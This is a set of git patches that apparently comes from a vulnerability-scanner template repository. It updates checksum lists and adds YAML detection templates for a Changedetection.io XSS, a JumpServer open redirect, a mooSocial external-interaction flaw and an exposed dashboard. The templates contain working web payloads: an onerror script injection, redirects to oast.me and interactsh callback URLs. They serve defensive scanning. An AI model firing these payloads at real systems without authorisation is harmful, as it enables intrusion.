+http/technologies/wordpress/plugins/pretty-link.yaml:d7a048160478551843fc2787e9d34162e0ef02fd +http/technologies/wordpress/plugins/really-simple-captcha.yaml:9094898f53e07d64200d33967eb529b5bf00d46f +http/technologies/wordpress/plugins/really-simple-ssl.yaml:3d3b3e367da6e9d30a3eb5ac0955e6817a00d206 +http/technologies/wordpress/plugins/redirection.yaml:24bac0bf3fbe611b453c9445d5517be03bfbb5d1 +http/technologies/wordpress/plugins/redux-framework.yaml:86c577c29228a57992cec80463ac1b5491c64c5c +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:7d000459f6636248654140cb0af63bdef585f175 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:7886db894516c71f786c8427ba1c2a5b3e092bf3 +http/technologies/wordpress/plugins/safe-svg.yaml:f11746c93254c6baa671686a75e84491c89824d3 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:ac3d7c0a24af783eba981c6e3ee8dcbc76d9e4db +http/technologies/wordpress/plugins/sg-cachepress.yaml:e4eee6eba3c34c57acb8d0d743d3a69e27c061ac +http/technologies/wordpress/plugins/sg-security.yaml:5a53692600d72dc512fd82ee896a5de7d968a2de +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:005a49766eb5ad3d064889894d8628375a839309 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a7269348d24aac273bfc50ef252c5014125c8d34 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:e291a870f574cb413673f3f7b255e71d99dece79 http/technologies/wordpress/plugins/simple-history.yaml:446824d0a69fc495005942a3e32febdca2e7dfb1 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead -http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f +http/technologies/wordpress/plugins/siteguard.yaml:cb120ee55443666b230261a7714edbd21ed4b09a +http/technologies/wordpress/plugins/siteorigin-panels.yaml:b691280d8e9a80e39cc3948d169656d11256f8fd +http/technologies/wordpress/plugins/smart-slider-3.yaml:d4d3773d13785e2d2bcf56ccd2b5c04d3c895deb +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:8340ca7217c167b392d3fea2b784b3faa6cb5f16 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:ac54099dbb8f7b99b15f26c9d05430808aff524f +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:183d76d12a4f4d4fbef52ee85c9329753d7f5bc3 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:6d4645ee6a289f869eca2d607c050f857f1ce2ac http/technologies/wordpress/plugins/svg-support.yaml:da47523057818a5fd4aa3e9d06c98c4f452f4222 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 -http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 -http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d -http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:625801ee278d5b31a9b2c75e8044775edc317724 +http/technologies/wordpress/plugins/tablepress.yaml:3467b8de0beb3f29c99126443a07a622d56471e4 +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:4e58e391914137fda6d60a54cfb3252a33ec79ab +http/technologies/wordpress/plugins/templately.yaml:24bf838e34a3802c6561b67ee612818f8acdfeb2 +http/technologies/wordpress/plugins/the-events-calendar.yaml:9c88c3e928dcbef231f223fce381c2eb960fe198 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 -http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:6f886393dc9a1a34fe232b094992071ff7f3c86b +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:8feafdabff9d640bf3d42f90669d048cc4fe6181 +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:08d466cb68c6a8c55bb9cdc7dce305bef6a7973d +http/technologies/wordpress/plugins/under-construction-page.yaml:4b22b12c9f250674f32dd0a72e5783a35f1ccf50 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 +http/technologies/wordpress/plugins/updraftplus.yaml:efd09bec4255558660f0201bbb062ab0f5f3080a http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 +http/technologies/wordpress/plugins/user-role-editor.yaml:584a20f6658b845eae296cd3c9caa70660117591 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 -http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 +http/technologies/wordpress/plugins/w3-total-cache.yaml:bca10686252215d05a5f32be91afafaed55cd66c +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:4a75d72d5b1e9ae764b513d4cb5eacb8ec79ae9e +http/technologies/wordpress/plugins/webp-express.yaml:04484fc18da7a3097ff8eef04e93712b9d3d238d +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:2ba342d8b534d83af412d7c87ac0a510b02fbdb9 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:0240f77a175007bb38fca4fcf6ee72a39605932f +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c0804d5324b6d650908e8c2786da832c3e56c4c5 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:7d8cebc29c3f777de3029c20ec10182e122ec758 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:910d708b1ffe8da5c48584f0aab2d3f06e479cec -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b -http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 -http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f -http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b -http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f -http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:63ac5e2c0769e54ffcd03e7f942625aa580e432a +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:f84a5a559bb1067053efbb2526e5dbaf1604b9dd +http/technologies/wordpress/plugins/woocommerce-payments.yaml:9fbd2d4d9f2c635b40a10310188b21846e425b60 +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:944a2cceb12042fe7c1b6d0d770544bd17a12091 +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:6296728bd1565b65b62d3ae20518e20058c012a9 +http/technologies/wordpress/plugins/woocommerce-services.yaml:2ea8bda51bfde200195c62161c1aacd25d40837b +http/technologies/wordpress/plugins/woocommerce.yaml:7242b42fa263e14e1f2fb2b28fc1881067975f19 +http/technologies/wordpress/plugins/wordfence.yaml:8cf2555ce8b9a37e92d84618300f567029aa2863 +http/technologies/wordpress/plugins/wordpress-importer.yaml:9f96a19e4a99e07b760838b6087ef1324f3e3dcc +http/technologies/wordpress/plugins/wordpress-seo.yaml:60f16bacb8ef84d6272e1578a4d41fef68089aa9 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c -http/technologies/wordpress/plugins/wp-crontrol.yaml:a95b9be19c9a370db0c2ada00abb45799a890083 -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 -http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 -http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 -http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec -http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 -http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc -http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca -http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 -http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb -http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b -http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 +http/technologies/wordpress/plugins/worker.yaml:5f7959ab46ba33c65a6d15d8c6d7ed722e8f0c47 +http/technologies/wordpress/plugins/wp-crontrol.yaml:27d8b4c3b7ba741e801464073d5db80854f1c6af +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:d5b6cf4bb0171dd1a4278561edaff4d1fd33ef65 +http/technologies/wordpress/plugins/wp-file-manager.yaml:964257f924c84636be6bfe2bdc97dc0d8af8ba00 +http/technologies/wordpress/plugins/wp-google-maps.yaml:17109418f8d19d7d398aaaec3bf63fbd599505a9 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:7615e30bb329bea408856deaacf38e5ed399ff07 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:71a3b39638051ce9ed2b3ded348afb672279de6a +http/technologies/wordpress/plugins/wp-migrate-db.yaml:52b3dd7e622dadd70087e37598adba88535a0f3a +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:1c7ceb3fdece714b8a31ab49ebb8342517deb38c +http/technologies/wordpress/plugins/wp-optimize.yaml:24a3c8466e2d7921d5541882691a14cbdcda7512 +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a239cbff17766b47120d61a42c8f21ea935b6c3 +http/technologies/wordpress/plugins/wp-reset.yaml:1ac5540102f632ec4c247f8c855c781cbb447e0a +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:0be20b24d1d7e0931881718fcfd542e9e2f45e42 +http/technologies/wordpress/plugins/wp-rollback.yaml:60622c0eda0ebf0228f68b0d8823b43679b3c0cf +http/technologies/wordpress/plugins/wp-seopress.yaml:7810a83b8cac808b1ca42ccd80aaad4f38e46b82 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:59fef35e70d9cc53b35b440c0548cd00f4d6df88 +http/technologies/wordpress/plugins/wp-smushit.yaml:fc86ba76c4b29045a1fae0cbbab7742f04b43e07 +http/technologies/wordpress/plugins/wp-statistics.yaml:da19f9f036479a1b0f1edbd6864e7be3e8cca528 +http/technologies/wordpress/plugins/wp-super-cache.yaml:eacbbb4b4c3392b17d8a82cadde144508b2f0642 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 -http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb -http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:e3b567d87072442e91a3dffeeaf8c618357d2fb9 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:8006fd6d5438ead5b7f7ba0cbf372271ffbf29ce +http/technologies/wordpress/plugins/wpforms-lite.yaml:7f0442d51ba37b874f77c06ba41aebe25d4d32ec +http/technologies/wordpress/plugins/wps-hide-login.yaml:552c9ab67ac6df624e78ce908dc5c019073d245a +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:d9f4f4f9af65d4f74dc4cc473b21b29fb68706d1 http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:d23e148ee53bd60e666faffd7b7c2daa658defb1 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8947,7 +8948,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:fecee26ddf922dc3ce7a040004bd1d0c6585c416 +templates-checksum.txt:58e12f02e2f66ec3074310e1cc9a626e78570a64 vulnerabilities/thinkphp/thinkphp6-arbitrary-write.yaml:cf90225cf0bd54905ceefa1a5827a5dc4b8c4099 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 From 53f55dfbf0372e84530ec3fc3f5ba2107521df2b Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Thu, 1 Aug 2024 07:39:46 +0000 Subject: [PATCH 15/46] Syncing Templates --- .github/workflows/templates-sync.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/.github/workflows/templates-sync.yml b/.github/workflows/templates-sync.yml index 49bc9c58b0..f583462847 100644 --- a/.github/workflows/templates-sync.yml +++ b/.github/workflows/templates-sync.yml @@ -5,6 +5,7 @@ on: - '.new-additions' - 'http/cves/2022/CVE-2022-27043.yaml' - 'http/cves/2023/CVE-2023-44393.yaml' + - 'http/cves/2023/CVE-2023-5222.yaml' - 'http/cves/2024/CVE-2024-39903.yaml' - 'http/cves/2024/CVE-2024-39907.yaml' - 'http/cves/2024/CVE-2024-6205.yaml' From dde3a2faf4fe234ed1a14269661844df56ea22d8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 07:40:35 +0000 Subject: [PATCH 16/46] Auto Template Signing [Thu Aug 1 07:40:35 UTC 2024] :robot: --- http/cves/2023/CVE-2023-5222.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/http/cves/2023/CVE-2023-5222.yaml b/http/cves/2023/CVE-2023-5222.yaml index 5068ade726..430d2ee6fd 100644 --- a/http/cves/2023/CVE-2023-5222.yaml +++ b/http/cves/2023/CVE-2023-5222.yaml @@ -67,3 +67,4 @@ http: - type: status status: - 200 +# digest: 490a0046304402205e4d25f934e60a71c86c0383fc9ea75d3d60a8eab84da76ba0f74a428eebbfb302200b230092cf6e1e982cf44258fe996e03cf7df7774d8e291fea40c94e96f08950:922c64590222798bb761d5b6d8e72950 \ No newline at end of file From b2a793f398ba3db2b52beeb02a3cdcdfab7a2238 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Aug 2024 14:07:06 +0530 Subject: [PATCH 17/46] Create CVE-2024-34061.yaml --- http/cves/2024/CVE-2024-34061.yaml | 62 ++++++++++++++++++++++++++++++ 1 file changed, 62 insertions(+) create mode 100644 http/cves/2024/CVE-2024-34061.yaml diff --git a/http/cves/2024/CVE-2024-34061.yaml b/http/cves/2024/CVE-2024-34061.yaml new file mode 100644 index 0000000000..8796781bac --- /dev/null +++ b/http/cves/2024/CVE-2024-34061.yaml @@ -0,0 +1,62 @@ +id: CVE-2024-34061 + +info: + name: Changedetection.io <=v0.45.21 - Cross-Site Scripting + author: ritikchaddha + severity: medium + description: | + Changedetection.io is a free open source web page change detection, website watcher, restock monitor and notification service. In affected versions Input in parameter notification_urls is not processed resulting in javascript execution in the application. A reflected XSS vulnerability happens when the user input from a URL or POST data is reflected on the page without being stored, thus allowing the attacker to inject malicious content. This issue has been addressed in version 0.45.22. Users are advised to upgrade. There are no known workarounds for this vulnerability. + reference: + - https://github.com/dgtlmoon/changedetection.io/security/advisories/GHSA-pwgc-w4x9-gw67 + - https://nvd.nist.gov/vuln/detail/CVE-2024-34061 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N + cvss-score: 4.3 + cve-id: CVE-2024-34061 + cwe-id: CWE-79 + metadata: + verified: true + max-request: 2 + shodan-query: html:"Change Detection" + tags: cve,cve2024,changedetection,xss + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + - | + POST /settings HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + csrf_token={{csrf_token}}&requests-time_between_check-weeks=&requests-time_between_check-days=&requests-time_between_check-hours=3&requests-time_between_check-minutes=&requests-time_between_check-seconds=&requests-jitter_seconds=0&application-filter_failure_notification_threshold_attempts=6&application-password=&application-base_url=&application-notification_urls=%22%3E%3Cimg+src%3Dx+onerror%3Dalert%28document.domain%29%3E&application-notification_title=ChangeDetection.io+Notification+-+%7B%7Bwatch_url%7D%7D&application-notification_body=%7B%7Bwatch_url%7D%7D+had+a+change.%0D%0A---%0D%0A%7B%7Bdiff%7D%7D%0D%0A---%0D%0A&application-notification_format=Text&application-fetch_backend=html_requests&application-webdriver_delay=&application-ignore_whitespace=y&application-global_subtractive_selectors=&application-global_ignore_text=&application-api_access_token_enabled=y&requests-extra_proxies-0-proxy_name=&requests-extra_proxies-0-proxy_url=&requests-extra_proxies-1-proxy_name=&requests-extra_proxies-1-proxy_url=&requests-extra_proxies-2-proxy_name=&requests-extra_proxies-2-proxy_url=&requests-extra_proxies-3-proxy_name=&requests-extra_proxies-3-proxy_url=&requests-extra_proxies-4-proxy_name=&requests-extra_proxies-4-proxy_url=&save_button=Save + + skip-variables-check: true + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'is not a valid AppRise URL' + condition: and + + - type: word + part: header + words: + - 'text/html' + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + name: csrf_token + group: 1 + regex: + - 'name="csrf_token" value="([^"]+)"' + internal: true From 053a79c37bc3c8364ee87c4879f7d87b494e7770 Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Aug 2024 14:07:55 +0530 Subject: [PATCH 18/46] Create CVE-2024-24763.yaml --- http/cves/2024/CVE-2024-24763.yaml | 46 ++++++++++++++++++++++++++++++ 1 file changed, 46 insertions(+) create mode 100644 http/cves/2024/CVE-2024-24763.yaml diff --git a/http/cves/2024/CVE-2024-24763.yaml b/http/cves/2024/CVE-2024-24763.yaml new file mode 100644 index 0000000000..7b906aabe4 --- /dev/null +++ b/http/cves/2024/CVE-2024-24763.yaml @@ -0,0 +1,46 @@ +id: CVE-2024-24763 + +info: + name: JumpServer < 3.10.0 - Open Redirect + author: ritikchaddha + severity: medium + description: | + JumpServer is an open source bastion host and an operation and maintenance security audit system. Prior to version 3.10.0, attackers can exploit this vulnerability to construct malicious links, leading users to click on them, thereby facilitating phishing attacks or cross-site scripting attacks. Version 3.10.0 contains a patch for this issue. No known workarounds are available. + reference: + - https://github.com/jumpserver/jumpserver/security/advisories/GHSA-p2mq-cm25-g4m5 + - https://nvd.nist.gov/vuln/detail/CVE-2024-24763 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:L + cvss-score: 4.3 + cve-id: CVE-2024-24763 + cwe-id: CWE-601 + cpe: cpe:2.3:a:smartbear:swagger_ui:*:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: fit2cloud + product: jumpserver + fofa-query: + - title="JumpServer" + - title="jumpserver" + tags: cve2024,cve,jumpserver,redirect,fit2cloud,authenticated + +http: + - raw: + - | + POST /{{paths}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + username={{username}}&password={{password}} + + payloads: + paths: + - "core/auth/login/?next=//oast.me" + - "auth/login/?next=//oast.me" + - "login/?next=//oast.me" + + matchers: + - type: regex + part: header + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?oast\.me(?:\s*?)$' From ce44fd5a70fced74074e41234a048fc59f16a98f Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Aug 2024 14:08:32 +0530 Subject: [PATCH 19/46] Create CVE-2023-43323.yaml --- http/cves/2023/CVE-2023-43323.yaml | 63 ++++++++++++++++++++++++++++++ 1 file changed, 63 insertions(+) create mode 100644 http/cves/2023/CVE-2023-43323.yaml diff --git a/http/cves/2023/CVE-2023-43323.yaml b/http/cves/2023/CVE-2023-43323.yaml new file mode 100644 index 0000000000..1666dcce0a --- /dev/null +++ b/http/cves/2023/CVE-2023-43323.yaml @@ -0,0 +1,63 @@ +id: CVE-2023-43323 + +info: + name: mooSocial 3.1.8 - External Service Interaction + author: ritikchaddha + severity: medium + description: | + mooSocial 3.1.8 is vulnerable to external service interaction via multiple parameters in the post function. + impact: | + An attacker can exploit this vulnerability to interact with external services. + remediation: | + Upgrade to a patched version of mooSocial to mitigate CVE-2023-43323. + reference: + - https://github.com/ahrixia/CVE-2023-43323 + - https://github.com/nomi-sec/PoC-in-GitHub + - https://nvd.nist.gov/vuln/detail/CVE-2023-43323 + classification: + cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N + cvss-score: 6.5 + cve-id: CVE-2023-43323 + epss-score: 0.00046 + epss-percentile: 0.15636 + cpe: cpe:2.3:a:moosocial:moosocial:3.1.8:*:*:*:*:*:*:* + metadata: + max-request: 1 + vendor: moosocial + product: moostore + shodan-query: http.favicon.hash:702863115clear + fofa-query: + - mooSocial + - moosocial + - icon_hash="702863115" + tags: cve,cve2023,moosocial,oast + +flow: http(1) && http(2) + +http: + - raw: + - | + GET / HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: word + part: body + words: + - "mooConfig" + internal: true + + - raw: + - | + POST /activities/ajax_share HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + [data%5Btype%5D=User&data%5Btarget_id%5D=0&data%5Baction%5D=wall_post&data%5Bwall_photo%5D=&data%5Bsubject_type%5D=&messageText=asas&data%5BuserShareLink%5D=&data%5BuserShareVideo%5D=http://{{interactsh-url}}%2F%3Fnull&data%5BuserTagging%5D=&data%5BshareImage%5D=1&data%5Bprivacy%5D=1] + + matchers: + - type: word + part: interactsh_protocol + words: + - "http" + - "dns" From 451eac3e776f9aa5fd20d50b865e13b3d8965cfc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Thu, 1 Aug 2024 14:16:56 +0530 Subject: [PATCH 20/46] Create changedetection-unauth.yaml --- .../changedetection-unauth.yaml | 32 +++++++++++++++++++ 1 file changed, 32 insertions(+) create mode 100644 http/misconfiguration/changedetection-unauth.yaml diff --git a/http/misconfiguration/changedetection-unauth.yaml b/http/misconfiguration/changedetection-unauth.yaml new file mode 100644 index 0000000000..989db4b97d --- /dev/null +++ b/http/misconfiguration/changedetection-unauth.yaml @@ -0,0 +1,32 @@ +id: changedetection-unauth + +info: + name: Changedetection.io Dashboard - Exposure + author: ritikchaddha + severity: medium + description: | + Changedetection.io unauth panel detected. + metadata: + verified: true + max-request: 1 + shodan-query: html:"Change Detection" + tags: changedetection,unauth,exposure + +http: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'SETTINGS' + - 'Change Detection' + condition: and + case-insensitive: true + + - type: status + status: + - 200 From 2ba555fb8d913ca5c81ff9a1d4ea6b32d043dda8 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 1 Aug 2024 08:57:31 +0000 Subject: [PATCH 22/46] Auto Generated Templates Checksum [Thu Aug 1 08:57:31 UTC 2024] :robot: --- templates-checksum.txt | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/templates-checksum.txt b/templates-checksum.txt index 1c47a205c4..b33d9df864 100644 --- a/templates-checksum.txt +++ b/templates-checksum.txt @@ -3355,7 +3355,7 @@ http/cves/2023/CVE-2023-50968.yaml:ba55dd8cde0223755e58c18a48ae9e7a5407aa62 http/cves/2023/CVE-2023-51449.yaml:f17017eea15c6a52827c4f6f17aec59624bfd30a http/cves/2023/CVE-2023-51467.yaml:ca66217bafda2b96c5c17cad532af4bee418699d http/cves/2023/CVE-2023-52085.yaml:8b9252b4ee0f19700fdbf7777b1865551167c2d8 -http/cves/2023/CVE-2023-5222.yaml:8bc7f580ccca2609792ecc60285ec1716d4c2c35 +http/cves/2023/CVE-2023-5222.yaml:741a4666825e65ee645aaeec0740dc6f63fbd537 http/cves/2023/CVE-2023-52251.yaml:4ca51f181f6db2932a1254864b5544ae056d8c88 http/cves/2023/CVE-2023-5244.yaml:e8676ea3fe8f5fdbf6a62de0894078ce7445b00d http/cves/2023/CVE-2023-5360.yaml:1914270d0878333c4f7605b7686f1c0ad1c009f8 @@ -3545,7 +3545,7 @@ http/default-logins/3com/3Com-wireless-default-login.yaml:80e8ff28f6fe58cd692d51 http/default-logins/3com/3com-nj2000-default-login.yaml:3c260ca4c2ee7809221fc4b9330a540795c081ce http/default-logins/3ware-default-login.yaml:c4ee7d8f55d3a9a6e674b4706b87321bbf25cfda 